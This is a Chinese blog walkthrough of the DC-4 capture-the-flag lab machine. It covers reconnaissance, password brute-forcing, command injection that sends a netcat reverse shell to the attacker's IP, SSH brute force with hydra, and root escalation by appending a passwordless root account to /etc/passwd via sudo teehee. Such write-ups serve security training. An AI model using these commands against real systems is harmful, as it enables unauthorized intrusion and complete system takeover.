• DC-4


    1.靶场搭建

     镜像地址:https://www.five86.com/dc-4.html

      Kali ip :192.168.1.162

      目标主机:192.168.1.105

    然后导入Vmware即可。

    2.信息搜集

    用 arp-scan -l 扫描同网段的其他IP地址,从而得到目的主机的IP。

    端口信息搜集

      使用到 nmap进行端口信息的搜集;

       nmap  -A -sV 192.168.1.105

     可见,该主机开启了80,22端口,对应http服务和ssh服务。

    3.漏洞利用

      在浏览器中访问 192.168.1.105 ;浏览器页面会产生响应。

     是一个后台管理登录的弹框,用户名就是admin;因此,此处需要爆破出admin账号的密码。

    最后,用burp的测试模块功能,使用字典爆破出密码为 happy。

    于是,账号:admin;吗,密码:happy,就可登录后台。

    登录后台,发现是一个可以执行命令的选项功能窗口。

    根据以往经验,由于存在命令执行,便可在此处进行shell反弹;

    抓包,修改数据;

    radio=nc 192.168.1.162 1234 -e /bin/bash&submit=Run

    修改之后,并且监听端口,nc -lvvp 1234;反弹shell

     

     然后用python打开一个标准的shell;这点不清楚为什么要这样说!

    python -c 'import pty;pty.spawn("/bin/bash")'

     

     切换到home目录下,查看用户信息;

     ps:中途有错误,请忽略!

    在这个目录下,存在一个.bak后缀的文件,这个是一个备份文件。

    继续打开,是一些简单的经典密码;

     将以上历史密码保存下来,用户名为jim;开始ssh的爆破。

     得到用户名为 jim;密码为: jibril04;进行ssh登录;

     登录成功,并且提示 you have  mail;肯定有猫腻。

    su root 无法进行权限的提升,提示密码错误。
    果不其然,找到了这个秘密!

    提权

    切换用户为 charles;

     可以看到,teehee可以不使用密码就进行命令的执行;不妨试一试以这个来提权,前面也用到了docker进行提权,这个应该也可以。

    查看帮助:

     使用命令可以将标准输入写入到指定文件中(以root权限写入文件内容);

    既然可以以root权限写入任意文件信息,那么我们就可以利用各种骚操作进行提权了;

    eg. 在 /etc/passwd/ 下写入一个具有 root 权限的新用户。

    sudo teehee -aa /etc/passwd

    aa::0:0:root:/root:/bin/bash

     总结:

    1.使用teehee进行提权

    2.hydra 工具爆破

    欢迎一起交流。
  • 相关阅读:
    adb命令
    linux常用命令(2)
    Cisco路由器配置基本命令
    linux常用命令
    跨站脚本攻击xss
    选择合适的索引列顺序
    索引的选择性
    mysql索引类型(按存储结构划分)
    mysql数据类型优化
    vim基本命令总结
  • 原文地址:https://www.cnblogs.com/huazige/p/15382531.html
Copyright © 2020-2023  润新知